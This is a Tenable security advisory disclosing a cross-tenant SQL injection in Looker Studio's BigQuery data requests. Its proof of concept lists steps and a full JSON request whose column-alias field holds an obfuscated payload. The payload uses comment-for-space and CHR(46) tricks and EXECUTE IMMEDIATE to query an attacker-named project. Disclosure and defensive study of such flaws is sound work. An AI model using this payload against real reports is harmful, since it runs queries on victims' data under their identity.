Google Cloud Platform (GCP) Zero-Click Cross-Tenant SQL Injection Vulnerability on Big Query in Looker Studio
CriticalSynopsis
Tenable Research has identified and responsibly disclosed a severe SQL injection vulnerability in Looker Studio. The vulnerability could have allowed an attacker with only view-level access to create a report to execute arbitrary SQL queries on behalf of the report's owner.
The issue stemmed from improper sanitization of user-controlled input within the batchedDataV2 HTTP request. When a user accessed a Looker Studio report, dynamically generated column aliases in the request were directly injected into the underlying BigQuery or potentially Spanner queries. An attacker could manipulate these aliases to inject SQL commands.
By carefully crafting a malicious request, an attacker could bypass limitations such as the removal of dots and spaces. This enabled them to execute arbitrary queries under the report owner's identity, potentially leading to data exfiltration, modification, or deletion of any data the owner had access to.
Proof of Concept
- Visit the victim’s report
- Proxy the requests and catch the batchedDataV2 request
- Inject SQL inside the JSON values and send the request.
{
"dataRequest": [
{
"requestContext": {
"reportContext": {
"reportId": "8aa098ec-7c4b-44fa-b318-bd2ce6ab2264",
"pageId": "76752849",
"mode": 1,
"componentId": "cd-0gl8hxqwsd",
"displayType": "simple-table"
},
"requestMode": 0
},
"datasetSpec": {
"dataset": [
{
"datasourceId": "b911a53d-621f-4ff2-ae31-63a31ab3a94f",
"revisionNumber": 0,
"parameterOverrides": []
}
],
"queryFields": [
{
"name": "qt_mcriqerwsda",
"datasetNs": "d0",
"tableNs": "t0",
"dataTransformation": {
"sourceFieldName": "_name_"
}
},
{
"name": "qt_1spiqerwsd_injection_starts_here/**/FROM/**/UNNEST([STRUCT('a'/**/AS/**/clmn0_)])/**/GROUP/**/BY/**/1;BEGIN/**/DECLARE/**/dot/**/STRING;DECLARE/**/table_name2/**/STRING;DECLARE/**/sql_query1/**/STRING;DECLARE/**/sql_query2/**/STRING;DECLARE/**/sql_query3/**/STRING;SET/**/dot/**/=/**/CHR(46);SET/**/table_name2/**/=/**/CONCAT(attacker-project',/**/dot,/**/'mydataset',/**/dot,/**/'exfila');SET/**/sql_query2/**/=/**/CONCAT('SELECT/**/*/**/FROM/**/`',/**/table_name2,/**/'`');EXECUTE/**/IMMEDIATE/**/sql_query2;END;SELECT/**/NULL/**/AS/**/t0_qt_1spiqerwsd",
"datasetNs": "d0",
"tableNs": "t0",
"dataTransformation": {
"sourceFieldName": "datastudio_record_count_system_field_id_98323387"
}
}
],
"sortData": [
{
"sortColumn": {
"name": "qt_1spiqerwsd",
"datasetNs": "d0",
"tableNs": "t0",
"dataTransformation": {
"sourceFieldName": "datastudio_record_count_system_field_id_98323387"
}
},
"sortDir": 1
}
],
"includeRowsCount": true,
"relatedDimensionMask": {
"addDisplay": false,
"addUniqueId": false,
"addLatLong": false
},
"paginateInfo": {
"startRow": 1,
"rowsCount": 100
},
"dsFilterOverrides": [],
"filters": [],
"features": [],
"dateRanges": [],
"contextNsCount": 1,
"calculatedField": [],
"needGeocoding": false,
"geoFieldMask": [],
"multipleGeocodeFields": [],
"timezone": "Asia/Jerusalem"
},
"role": "main",
"retryHints": {
"useClientControlledRetry": true,
"isLastRetry": false,
"retryCount": 0,
"originalRequestId": "cd-0gl8hxqwsd_0_0"
}
}
]
}- Refresh the victim’s report.
- SQL runs on the victim's data.
All information within TRA advisories is provided “as is”, without warranty of any kind, including the implied warranties of merchantability and fitness for a particular purpose, and with no guarantee of completeness, accuracy, or timeliness. Individuals and organizations are responsible for assessing the impact of any actual or potential security vulnerability.
Tenable takes product security very seriously. If you believe you have found a vulnerability in one of our products, we ask that you please work with us to quickly resolve it in order to protect customers. Tenable believes in responding quickly to such reports, maintaining communication with researchers, and providing a solution in short order.
For more details on submitting vulnerability information, please see our Vulnerability Reporting Guidelines page.
If you have questions or corrections about this advisory, please email [email protected]
Risk Information
Liv Matan
GCP Looker Studio
Critical